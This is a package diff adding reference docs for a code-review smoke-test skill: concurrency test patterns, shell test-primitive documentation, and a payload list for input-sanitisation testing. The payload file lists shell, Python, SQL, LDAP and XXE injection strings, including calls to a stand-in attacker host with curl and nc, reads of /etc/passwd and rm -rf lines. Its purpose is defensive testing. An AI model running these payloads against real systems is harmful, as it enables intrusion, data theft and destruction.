code-review-forge 2.0.0a1__py3-none-any.whl

code_forge/skills/smoke-test/references/concurrency-patterns.md

@@ -0,0 +1,306 @@
+# Concurrency Testing Patterns
+
+Test scenarios for race conditions, deadlocks, and lock contention.
+
+## When to Test Concurrency
+
+- Code uses locks (`flock`, `fcntl`, mutexes)
+- Code modifies shared files (state files, logs, caches)
+- Code spawns background processes
+- Code uses signals (SIGINT, SIGTERM)
+- Code has check-then-act patterns (TOCTOU)
+
+## Race Condition Patterns
+
+### 1. Check-Then-Act (TOCTOU)
+
+**Vulnerable code**:
+```bash
+if [[ ! -f "$LOCKFILE" ]]; then
+    touch "$LOCKFILE"  # Race: another process can create between check and touch
+    # critical section
+fi
+```
+
+**Test**:
+```bash
+# Spawn 10 concurrent instances
+for i in {1..10}; do
+    ./script.sh &
+done
+wait
+
+# Verify only one lockfile created
+ls -l "$LOCKFILE"
+```
+
+### 2. Read-Modify-Write
+
+**Vulnerable code**:
+```bash
+count=$(cat counter.txt)
+count=$((count + 1))
+echo "$count" > counter.txt  # Race: another process can write between read and write
+```
+
+**Test**:
+```bash
+echo "0" > counter.txt
+for i in {1..100}; do
+    ./increment.sh &
+done
+wait
+
+# Verify counter is 100 (not less due to lost updates)
+cat counter.txt
+```
+
+### 3. File Append Without Lock
+
+**Vulnerable code**:
+```bash
+echo "log entry" >> logfile.txt  # Race: interleaved writes
+```
+
+**Test**:
+```bash
+> logfile.txt
+for i in {1..100}; do
+    (echo "entry-$i" >> logfile.txt) &
+done
+wait
+
+# Verify 100 complete lines (no partial/interleaved entries)
+wc -l logfile.txt
+grep -c "^entry-" logfile.txt
+```
+
+## Deadlock Patterns
+
+### 1. Lock Ordering Violation
+
+**Vulnerable code**:
+```bash
+# Process A
+flock 9
+flock 10
+
+# Process B
+flock 10  # Deadlock: A holds 9 waits for 10, B holds 10 waits for 9
+flock 9
+```
+
+**Test**:
+```bash
+# Spawn two processes with opposite lock order
+(flock 9; sleep 1; flock 10; echo "A done") &
+(flock 10; sleep 1; flock 9; echo "B done") &
+
+# Wait with timeout
+timeout 5 wait || echo "DEADLOCK DETECTED"
+```
+
+### 2. Self-Deadlock
+
+**Vulnerable code**:
+```bash
+flock 9
+# ... code that calls itself recursively ...
+flock 9  # Deadlock: trying to acquire same lock twice
+```
+
+**Test**:
+```bash
+# Call script recursively
+DEPTH=0 ./script.sh
+# Inside script: DEPTH=$((DEPTH + 1)); if [[ $DEPTH -lt 3 ]]; then ./script.sh; fi
+
+# Verify completes without hanging
+timeout 5 ./script.sh || echo "SELF-DEADLOCK DETECTED"
+```
+
+## Lock Contention Patterns
+
+### 1. High Contention (Many Writers)
+
+**Test**:
+```bash
+# Spawn 100 concurrent writers
+for i in {1..100}; do
+    ./write-with-lock.sh "data-$i" &
+done
+wait
+
+# Verify all writes succeeded
+wc -l output.txt  # Should be 100
+```
+
+### 2. Lock Timeout Fallback
+
+**Test**:
+```bash
+# Hold lock indefinitely in background
+(flock 9; sleep 60) &
+HOLDER_PID=$!
+
+# Try to acquire with timeout
+flock -w 2 9 || echo "TIMEOUT - fallback triggered"
+
+kill $HOLDER_PID
+```
+
+### 3. Non-Blocking Lock
+
+**Test**:
+```bash
+# Hold lock in background
+(flock 9; sleep 5) &
+
+# Try non-blocking acquire
+flock -n 9 && echo "ACQUIRED" || echo "BUSY - fallback triggered"
+```
+
+## Signal Handling Patterns
+
+### 1. Interrupted System Call
+
+**Vulnerable code**:
+```bash
+curl https://api.example.com  # SIGINT during download leaves partial file
+```
+
+**Test**:
+```bash
+# Start long-running operation
+./script.sh &
+PID=$!
+
+# Send SIGINT after 1 second
+sleep 1
+kill -INT $PID
+
+# Verify cleanup happened (temp files removed, locks released)
+ls /tmp/script-*.tmp  # Should not exist
+flock -n 9 && echo "Lock released" || echo "Lock still held"
+```
+
+### 2. Signal During Critical Section
+
+**Test**:
+```bash
+# Send signal during file write
+./script.sh &
+PID=$!
+sleep 0.5  # Wait until likely in critical section
+kill -TERM $PID
+
+# Verify file not corrupted
+if [[ -f output.txt ]]; then
+    # File should be valid JSON/complete lines/etc.
+    jq . output.txt || echo "CORRUPTED"
+fi
+```
+
+## Testing Tools
+
+### Parallel Execution
+
+```bash
+# GNU parallel (if available)
+parallel -j 10 ./script.sh ::: {1..100}
+
+# xargs
+seq 1 100 | xargs -P 10 -I {} ./script.sh {}
+
+# Bash background jobs
+for i in {1..100}; do ./script.sh & done; wait
+```
+
+### Stress Testing
+
+```bash
+# stress-ng (CPU/memory/I/O stress)
+stress-ng --cpu 4 --io 2 --vm 1 --timeout 60s &
+STRESS_PID=$!
+
+# Run concurrent tests under stress
+for i in {1..50}; do ./script.sh & done
+wait
+
+kill $STRESS_PID
+```
+
+### Race Detection
+
+```bash
+# Run same operation many times to increase race probability
+for attempt in {1..1000}; do
+    ./script.sh &
+done
+wait
+
+# Check for corruption
+if [[ $(wc -l < state.txt) -ne 1000 ]]; then
+    echo "RACE CONDITION DETECTED"
+fi
+```
+
+## Verification Checklist
+
+After concurrent execution:
+
+- [ ] State files have valid content (not corrupted)
+- [ ] Log files have expected number of entries (no lost writes)
+- [ ] No "text file busy" errors
+- [ ] No orphaned lock files
+- [ ] No zombie processes (`ps aux | grep defunct`)
+- [ ] Exit codes are correct (not all failures)
+- [ ] Temp files cleaned up (`ls /tmp/script-*`)
+
+## Common Bugs Found
+
+| Bug | Symptom | Root Cause |
+|-----|---------|------------|
+| Lost updates | Counter is 87 instead of 100 | Read-modify-write without lock |
+| Corrupted files | JSON parse error | Interleaved writes |
+| Orphaned locks | Second run hangs forever | Lock not released on error |
+| Partial writes | File has incomplete lines | Signal during write |
+| Deadlock | Process hangs indefinitely | Lock ordering violation |
+
+## Example Test Script
+
+```bash
+#!/bin/bash
+# Concurrency test for kimi-next-key.sh
+
+STATE_FILE="$HOME/.config/kimi/state"
+echo "0" > "$STATE_FILE"
+
+echo "=== Test 1: 10 concurrent calls ==="
+for i in {1..10}; do
+    ./kimi-next-key.sh > /dev/null &
+done
+wait
+
+# Verify state file not corrupted
+if [[ $(cat "$STATE_FILE") =~ ^[0-9]+$ ]]; then
+    echo "PASS: state file valid"
+else
+    echo "FAIL: state file corrupted"
+fi
+
+echo "=== Test 2: Lock contention fallback ==="
+# Hold lock in background
+(flock 9; sleep 5) 9>"$STATE_FILE.lock" &
+HOLDER=$!
+
+# Try to acquire (should fallback)
+output=$(./kimi-next-key.sh 2>&1)
+if echo "$output" | grep -q "unvalidated fallback"; then
+    echo "PASS: fallback triggered"
+else
+    echo "FAIL: no fallback message"
+fi
+
+kill $HOLDER 2>/dev/null
+```

code_forge/skills/smoke-test/references/injection-payloads.md

@@ -0,0 +1,124 @@
+# Injection Attack Payloads
+
+Common payloads for security testing. Use these to verify input sanitization.
+
+## Command Injection (Shell)
+
+```bash
+# Basic command substitution
+$(id)
+`whoami`
+$(curl attacker.com)
+
+# Command chaining
+; ls -la
+&& cat /etc/passwd
+|| rm -rf /tmp/test
+
+# Pipe injection
+| nc attacker.com 4444
+
+# Backgrounding
+& sleep 60 &
+```
+
+## Python Code Injection
+
+```python
+# String escape
+"""; import os; os.system("id"); x="""
+'''; __import__('os').system('whoami'); y='''
+
+# Import injection
+__import__('subprocess').call(['id'])
+eval('__import__("os").system("ls")')
+
+# File operations
+open('/etc/passwd').read()
+```
+
+## JSON Injection
+
+```json
+# Quote escape
+{"key": "value\", \"injected\": \"data"}
+
+# Unicode escape
+{"key": ""injected""}
+
+# Nested injection
+{"key": {"nested": "value\"}, \"evil\": \"payload"}}
+```
+
+## Path Traversal
+
+```bash
+# Directory traversal
+../../etc/passwd
+../../../tmp/evil.sh
+....//....//etc/passwd
+
+# Null byte injection (older systems)
+/etc/passwd%00.txt
+../../etc/passwd\x00
+
+# URL encoding
+..%2F..%2Fetc%2Fpasswd
+```
+
+## SQL Injection
+
+```sql
+# Authentication bypass
+' OR 1=1 --
+admin' --
+' OR 'a'='a
+
+# Data extraction
+' UNION SELECT password FROM users --
+
+# Destructive
+'; DROP TABLE users; --
+```
+
+## LDAP Injection
+
+```ldap
+# Filter bypass
+*)(uid=*))(|(uid=*
+admin)(&(password=*))
+
+# Wildcard
+*
+```
+
+## XML/XXE Injection
+
+```xml
+<!-- External entity -->
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
+<root>&xxe;</root>
+
+<!-- Billion laughs -->
+<!DOCTYPE lolz [
+  <!ENTITY lol "lol">
+  <!ENTITY lol2 "&lol;&lol;">
+]>
+```
+
+## Testing Methodology
+
+1. **Identify injection points**: User input, API responses, file contents, environment variables
+2. **Select relevant payloads**: Match payload type to context (shell/Python/JSON/etc.)
+3. **Execute with payload**: Replace normal input with attack payload
+4. **Verify no execution**: Check that payload is treated as literal data
+5. **Check error handling**: Ensure errors don't leak sensitive info
+
+## Safe vs Unsafe
+
+| Context | Unsafe | Safe |
+|---------|--------|------|
+| Shell command | `os.system(f"ls {user_input}")` | `subprocess.run(['ls', user_input])` |
+| Python eval | `eval(user_input)` | `json.loads(user_input)` |
+| SQL query | `f"SELECT * FROM users WHERE id={uid}"` | `cursor.execute("SELECT * FROM users WHERE id=?", (uid,))` |
+| File path | `open(f"/data/{user_input}")` | `open(os.path.join('/data', os.path.basename(user_input)))` |

code_forge/skills/smoke-test/test-library/shell/README.md

@@ -0,0 +1,271 @@
+# Shell Smoke-Test Primitives
+
+## Quick Start
+
+```bash
+source ~/.claude/skills/smoke-test/test-library/shell/primitives.sh
+```
+
+## Primitives Index
+
+### Helpers
+
+| Function | Parameters | Purpose |
+|----------|-----------|---------|
+| `run_and_capture <cmd...>` | command + args | Execute command, capture stdout/stderr/status to `$SMOKE_LAST_STDOUT`/`$SMOKE_LAST_STDERR`/`$SMOKE_LAST_STATUS` |
+| `run_concurrent <N> <cmd...>` | N=count, then command | Launch N background instances, store results in `$CONCURRENT_RESULT_DIR`/`$CONCURRENT_PIDS` |
+| `concurrent_wait` |  --  | Reap all background PIDs from `run_concurrent` |
+
+### Execution
+
+| Function | Parameters | Purpose |
+|----------|-----------|---------|
+| `assert_success <status> [desc]` | exit code, description | PASS if status == 0 |
+| `assert_failure <status> [desc]` | exit code, description | PASS if status != 0 |
+| `assert_exit_code <expected> <actual> [desc]` | expected, actual, description | PASS if actual == expected |
+
+### Output
+
+| Function | Parameters | Purpose |
+|----------|-----------|---------|
+| `assert_output_contains <output> <pattern> [desc]` | text, substring, description | PASS if output contains pattern (fixed string) |
+| `assert_output_not_contains <output> <pattern> [desc]` | text, substring, description | PASS if output does NOT contain pattern |
+| `assert_stderr_empty [desc]` | description | PASS if `$SMOKE_LAST_STDERR` file is empty |
+| `assert_stderr_contains <stderr> <pattern> [desc]` | text, substring, description | PASS if stderr text contains pattern |
+
+### File/State
+
+| Function | Parameters | Purpose |
+|----------|-----------|---------|
+| `assert_file_exists <file> [desc]` | path, description | PASS if regular file exists |
+| `assert_file_not_exists <file> [desc]` | path, description | PASS if file does NOT exist |
+| `assert_file_contains <file> <pattern> [desc]` | path, substring, description | PASS if file contains pattern |
+
+### Security
+
+| Function | Parameters | Purpose |
+|----------|-----------|---------|
+| `assert_no_command_exec <input> [context]` | string, context | PASS if no `$()`, backticks, `<()`, `;&\|` in input |
+| `assert_no_command_exec_json <input> [context]` | string, context | JSON/URL-safe: only checks `$()`, backticks, `<()`, skips `;&\|` |
+| `assert_no_path_traversal <input> [context]` | string, context | PASS if no `../`, `..\`, URL-encoded traversal |
+
+### Process
+
+| Function | Parameters | Purpose |
+|----------|-----------|---------|
+| `assert_no_zombie [pid] [desc] [max_depth]` | root PID, description, max depth (default: 100) | PASS if no zombie processes in process tree (recursive `/proc` scan, depth-limited) |
+| `assert_temp_clean [pattern] [desc]` | glob pattern, description | PASS if no matching temp files (default: `/tmp/smoke-test-*`) |
+
+### Data
+
+| Function | Parameters | Purpose |
+|----------|-----------|---------|
+| `assert_json_valid <file-or-str> [desc] [schema]` | path or JSON string, description, optional jq schema expression | PASS if valid JSON; optional `schema` validates structure via `jq -e`; SKIP if jq not installed |
+
+## Decision Table
+
+| Change Type | Required | Optional |
+|------------|----------|----------|
+| New CLI parameter | `assert_success`, `assert_output_contains` | `assert_stderr_empty` |
+| Error handling | `assert_failure`, `assert_stderr_contains` | `assert_exit_code` |
+| File operations | `assert_file_exists`, `assert_file_contains` | `assert_file_not_exists` |
+| Concurrency | `assert_success` (xN), `assert_no_zombie` | `assert_temp_clean`, `assert_file_contains` (race check) |
+| Security patch | `assert_no_command_exec`, `assert_no_path_traversal` | `assert_output_not_contains` |
+| API response | `assert_json_valid`, `assert_output_contains` | `assert_no_command_exec_json` (if response passed to shell) |
+| Config parsing | `assert_success`, `assert_file_contains` |  --  |
+| Log output | `assert_output_contains` | `assert_stderr_empty` |
+| Cleanup logic | `assert_file_not_exists` |  --  |
+
+## Act Pattern
+
+### Standard (single command)
+
+```bash
+run_and_capture ./script.sh --flag value
+output=$(cat "$SMOKE_LAST_STDOUT")
+assert_success "$SMOKE_LAST_STATUS" "script.sh --flag"
+assert_output_contains "$output" "expected substring" "flag output"
+```
+
+### Concurrent (N instances, zombie-safe)
+
+```bash
+run_concurrent 5 ./kimi-next-key.sh
+sleep 0.5                              # wait for child exits, zombie forms
+assert_no_zombie $$ "kimi-next-key"     # detect BEFORE reap
+concurrent_wait; cw_status=$?
+assert_success "$cw_status" "concurrent execution"
+# Per-instance diagnostics on failure
+if [[ $cw_status -ne 0 ]]; then
+    for ((i=0; i<5; i++)); do
+        s=$(cat "$CONCURRENT_RESULT_DIR/$i.status" 2>/dev/null || echo unknown)
+        (( s != 0 )) && echo "  instance $i FAIL: exit=$s"
+    done
+fi
+```
+
+## Safety Primitive Usage Guide
+
+### `assert_no_command_exec`
+
+**Applicable**: input passed to `eval`/`sh -c`, constructing shell commands, `source $input`.
+
+**NOT applicable**: JSON/XML/YAML data, URL query strings (contain `&`), regex patterns (contain `|`). For these, use `assert_no_command_exec_json` instead.
+
+### `assert_no_command_exec_json`
+
+JSON/URL-safe variant. Only checks for command execution/substitution (`$()`, backticks, `<()`), skips `;&|` which appear legitimately in URL query strings and regex patterns.
+
+| Input | `assert_no_command_exec` | `assert_no_command_exec_json` |
+|-------|--------------------------|------------------------------|
+| `$(id)` | FAIL | FAIL |
+| `` `whoami` `` | FAIL | FAIL |
+| `<(cat /etc/passwd)` | FAIL | FAIL |
+| `; rm -rf /` | FAIL | PASS (false positive avoided) |
+| `key=value&foo=bar` | FAIL | PASS (URL-safe) |
+| `error\|warn\|info` | FAIL | PASS (regex-safe) |
+
+**Use when**: input contains structured data (JSON, URL params, regex), but still want to catch command execution via `$()`, backticks, or `<()`.
+
+### Known Boundaries
+
+These attack vectors are intentionally not covered. They require semantic parsing beyond smoke-test scope:
+
+| Vector | Reason |
+|--------|--------|
+| `${IFS}` / `${var:-cmd}` variable expansion | `${}` is ubiquitous in legitimate configs, templates, and sed patterns. Distinguishing malicious expansion from benign usage requires shell-semantic parsing. Cover via semgrep in Step 0. |
+| Nested obfuscation (`$($(echo id))`) | Detected (outer `$()` fires). Inner payload is not de-obfuscated  --  that's the job of a static analyzer. |
+
+### `assert_no_path_traversal`
+
+Detects `../` and URL-encoded `%2e%2e%2f`. Absolute path detection (`^/`) is commented out by default  --  enable per context.
+
+### `assert_no_zombie` Depth Limit
+
+The optional `max_depth` parameter (default: 100) prevents infinite recursion in abnormally deep process trees. On depth exceeded, emits a WARNING and returns without counting as FAIL:
+
+```bash
+# Default: max depth 100
+assert_no_zombie $$ "default depth"
+
+# Shallow scan: only check depth <= 10
+assert_no_zombie $$ "shallow check" 10
+
+# Deep scan for known deep process trees
+assert_no_zombie $$ "deep check" 500
+```
+
+### `assert_json_valid` Schema Validation
+
+The optional `schema` parameter accepts a jq boolean expression. After format validation passes, runs `jq -e "$schema"` for structural validation:
+
+```bash
+# Format-only validation (backward compatible)
+assert_json_valid '{"key":"value"}' "basic check"
+
+# Schema: assert a specific value
+assert_json_valid '{"status":"ok"}' "status check" '.status == "ok"'
+
+# Schema: assert field exists and is truthy
+assert_json_valid '{"count":5}' "has count" '.count'
+
+# Schema: assert numeric range
+assert_json_valid '{"code":200}' "http 200" '.code >= 200 and .code < 300'
+
+# From file with schema
+echo '{"items":["a","b"]}' > /tmp/resp.json
+assert_json_valid /tmp/resp.json "has items array" '.items | length > 0'
+```
+
+Schema validation uses `jq -e` (exit 0 = truthy, exit 1 = false/null). A schema that returns `false` or `null` means FAIL.
+
+## Combination Rules
+
+### Contradictions (using both guarantees a FAIL, not a tool bug)
+
+| Pair | Why |
+|------|-----|
+| `assert_success` + `assert_failure` | Cannot both pass on same exit code |
+| `assert_exit_code 0` + `assert_exit_code 1` | Cannot both pass |
+| `assert_stderr_empty` + `assert_stderr_contains` | Cannot both pass on same stderr |
+
+### Recommended Combinations
+
+- Command success + output: `assert_success` + `assert_output_contains`
+- Command failure + error: `assert_failure` + `assert_stderr_contains`
+- Security: `assert_no_command_exec` + `assert_no_path_traversal`
+- File write: `run_and_capture cmd` -> `assert_success` + `assert_file_exists` + `assert_file_contains`
+
+### Zombie Detection Race Window
+
+`assert_no_zombie` must be called AFTER the target script's children have exited but BEFORE they are reaped. With `run_concurrent`:
+
+1. `run_concurrent N cmd`  --  launches N background instances
+2. `sleep D`  --  wait for inner children to exit (D depends on the script's internal runtime)
+3. `assert_no_zombie $$`  --  scan while zombies are still present
+4. `concurrent_wait`  --  reap after detection
+
+The `sleep` duration is script-specific. If the negative test in `primitives_test.sh` produces SKIP, the zombie window was too short  --  the test is not counted as a failure.
+
+The optional `max_depth` parameter (positional arg 3) limits recursion depth to prevent infinite loops in abnormally deep process trees. Default is 100. On exceeding the limit, a WARNING is emitted and the scan continues without counting as FAIL.
+
+Reliable zombie test fixtures require a non-bash intermediate (bash auto-reaps direct children). The P3 verification uses `python3 subprocess.Popen` for this purpose  --  see `test_case2_concurrency.sh` for the reference pattern.
+
+## Concurrency Safety
+
+### SMOKE_LAST_* Variable Overwrite
+
+`run_and_capture` exports global variables (`SMOKE_LAST_STDOUT`, `SMOKE_LAST_STDERR`, `SMOKE_LAST_STATUS`). Nested or sequential calls overwrite previous values:
+
+```bash
+# WRONG: using $SMOKE_LAST_STDOUT after a second run_and_capture
+run_and_capture ./outer.sh
+outer_status=$SMOKE_LAST_STATUS
+run_and_capture ./inner.sh            # overwrites $SMOKE_LAST_STDOUT
+assert_output_contains "$(cat "$SMOKE_LAST_STDOUT")" "outer text"  # FAIL: reads inner.sh output
+
+# CORRECT: save immediately after each run_and_capture
+run_and_capture ./outer.sh
+outer_stdout=$(cat "$SMOKE_LAST_STDOUT")
+outer_status=$SMOKE_LAST_STATUS
+run_and_capture ./inner.sh
+assert_output_contains "$outer_stdout" "outer text"  # PASS
+```
+
+### run_concurrent Isolation
+
+Each background instance creates its own temp files in `$CONCURRENT_RESULT_DIR/{i}.{out,err,status}`. No variable conflicts between instances.
+
+### Multi-Line Primitive Output
+
+Some primitives (e.g. `assert_no_zombie`) output debug details before the PASS/FAIL line. When capturing with `$(...)`, use `grep -q '^FAIL:'` rather than `[[ "$result" == FAIL:* ]]`:
+
+```bash
+result=$(assert_no_zombie "$pid" "check")
+# WRONG: prefix match fails when ZOMBIE lines precede FAIL:
+[[ "$result" == FAIL:* ]]
+# CORRECT: grep for the line of interest:
+echo "$result" | grep -q '^FAIL:'
+```
+
+## Dependencies
+
+| Tool | Required By | Install |
+|------|------------|---------|
+| `jq` | `assert_json_valid` | `dnf install jq` (RHEL/Fedora), `apt install jq` (Debian/Ubuntu) |
+| `python3` | P3 verification fixtures only | pre-installed on RHEL/Fedora |
+
+Without `jq`, `assert_json_valid` returns SKIP (exit 0, never FAIL).
+`python3` is NOT required by `primitives.sh` itself  --  only by the P3 verification fixtures that test zombie detection with a non-bash intermediate.
+
+## Secret Security
+
+- FAIL debug output masks `sk-*` API keys: `sed 's/sk-[A-Za-z0-9]\{20,\}/\*\*\*/g'`
+- Tests should use fake credentials (`test-key-12345`), never real API keys
+
+## Prefix Isolation
+
+| Prefix | Owner | Scanned by `assert_temp_clean` |
+|--------|-------|-------------------------------|
+| `/tmp/smoke-fw-*` | Framework (run_and_capture, run_concurrent) | No |
+| `/tmp/smoke-test-*` | Tests (script-generated temp files) | Yes (default) |